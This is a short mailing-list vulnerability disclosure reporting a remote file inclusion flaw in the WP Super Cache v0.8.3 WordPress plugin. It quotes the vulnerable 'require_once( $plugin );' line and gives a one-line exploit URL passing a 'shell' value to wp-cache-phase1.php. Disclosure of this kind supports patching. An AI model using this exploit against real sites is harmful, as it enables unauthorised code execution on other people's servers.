[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

wordpress plugins WP Super Cache v0.8.3 Remote File Inclusion Vulnerability



Hi Dear,
I found a new bug. please publish it.
thank you
best regards
===========================================================================================


  [o] wordpress plugins WP Super Cache v0.8.3 Remote File Inclusion Vulnerability

       Software     :  WP Super Cache v0.8.3
       Vendor       :  http://wordpress.org/
       Download     :  http://downloads.wordpress.org/plugin/wp-super-cache.0.8.3.zip
       Author       :  Cru3l.b0y
       Home         :  WwW.DeltaHacking.Net
       Description  :  A very fast caching engine for WordPress that produces static html files.
===========================================================================================

  [o] Vulnerable file

         wp-cache-phase1.php

	        require_once( $plugin );
	
	
  [o] Exploit

            http://localhost/[path]/wp-cache-phase1.php?plugin=shell